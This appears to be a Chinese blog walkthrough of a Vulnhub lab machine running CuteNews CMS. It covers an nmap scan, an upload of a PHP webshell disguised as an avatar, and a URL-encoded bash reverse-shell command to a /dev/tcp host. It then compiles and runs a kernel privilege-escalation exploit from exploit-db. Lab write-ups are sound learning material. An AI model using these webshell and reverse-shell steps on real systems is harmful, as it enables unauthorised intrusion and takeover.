[Vulnhub] Simple CuteNews-CMS+Kernel权限提升

Мартин.2024-07-14 21:42

信息收集

IP Address Opening Ports
192.168.8.104 TCP:80

$ nmap -p- 192.168.8.104 --min-rate 1000 -sC -sV

bash 复制代码 
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Please Login / CuteNews
|_http-server-header: Apache/2.4.7 (Ubuntu)

本地权限

注册用户登录

Content-Disposition: form-data; name="avatar_file"; filename="reverse.php"

http://192.168.8.104/uploads/avatar_admin2_reverse.php?cmd=%2Fbin%2Fbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.8.107%2F10032%200%3E%261%27

权限提升

$ cat /etc/os-release

https://www.exploit-db.com/exploits/36746

$ gcc 36746.c -static -o 36746

# ./36746

相关推荐
Ha_To3 分钟前
2025.12.19 OSPF
运维·服务器·网络
MicroTech20254 分钟前
隐私计算与区块链融合:微算法科技(NASDAQ MLGO)构建新一代区块链网络的创新实践
网络·科技·区块链
神的孩子都在歌唱11 分钟前
eNSP 中使用 NAT 地址池实现内网出网转换
网络
加勒比之杰克12 分钟前
【操作系统原理】进程间通信之管道
网络·管道·ipc
zore_c12 分钟前
【数据结构】队列——超详解!!!(包含队列的实现)
c语言·网络·数据结构·c++·笔记·算法·链表
可爱又迷人的反派角色“yang”2 小时前
ansible剧本编写(三)
linux·网络·云计算·ansible
m0_738120722 小时前
应急响应——知攻善防Web-3靶机详细教程
服务器·前端·网络·安全·web安全·php
橘子真甜~9 小时前
C/C++ Linux网络编程15 - 网络层IP协议
linux·网络·c++·网络协议·tcp/ip·计算机网络·网络层
Allen正心正念20259 小时前
网络编程与通讯协议综合解析
网络
bing_feilong9 小时前
ubuntu中的WIFI与自身热点切换
网络
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04RedissonClient的配置解析05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)07BongoCat - 跨平台键盘猫动画工具08Open-AutoGLM Windows 安装部署教程09jdk21下载、安装(Windows、Linux、macOS)10【AutoGLM部署】本地私有化部署AI手机Agent